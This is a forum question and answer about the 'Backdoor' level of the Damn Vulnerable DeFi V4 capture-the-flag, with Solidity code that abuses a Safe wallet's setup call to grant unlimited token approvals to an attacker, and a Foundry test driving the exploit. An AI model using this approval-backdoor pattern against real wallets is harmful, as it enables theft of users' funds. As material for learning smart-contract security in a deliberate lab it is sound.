Difference in parameters makes one way pass while other fail. Why?
I'm doing right now Damn Vulnerable Defi V4, specifically 11.Backdoor. I tried to do it my way, but something didn't work so I checked solution. And here's the deal while my code doesn't work:
contract AttackContract {

  DamnValuableToken token;

  constructor(DamnValuableToken _token) {
    token = _token;
  }

  function maliciousApprove(address spender,uint256 amount) public {
    token.approve(spender, amount);
  }

}

The one from solution does work:
contract AttackContract {

  function maliciousApprove(DamnValuableToken token, address spender) public {
    token.approve(spender, type(uint256).max);
  }

}

Specifically test reverts after approving from AttackContract
Here's the full test:
function test_backdoor() public checkSolvedByPlayer {

      AttackContract attackContract = new AttackContract();

      for (uint i = 0; i < users.length; i++) {
        address[] memory owners = new address[](1);
        owners[0] = users[i];

        bytes memory initializer2 = abi.encodeCall(
          AttackContract.maliciousApprove,
          (token, address(this))
        );

        bytes memory initializer = abi.encodeCall(
          Safe.setup, (
          owners,
          1,
          address(attackContract),
          initializer2,
          address(0),
          address(0),
          0,
          payable(address(0))
        )
        );

        SafeProxy proxy = walletFactory.createProxyWithCallback(address(singletonCopy), initializer, 1, walletRegistry);
      }
    }



Your contract is expecting an argument to the constructer to initialize the token.  The test passes no such argument so token is never set.
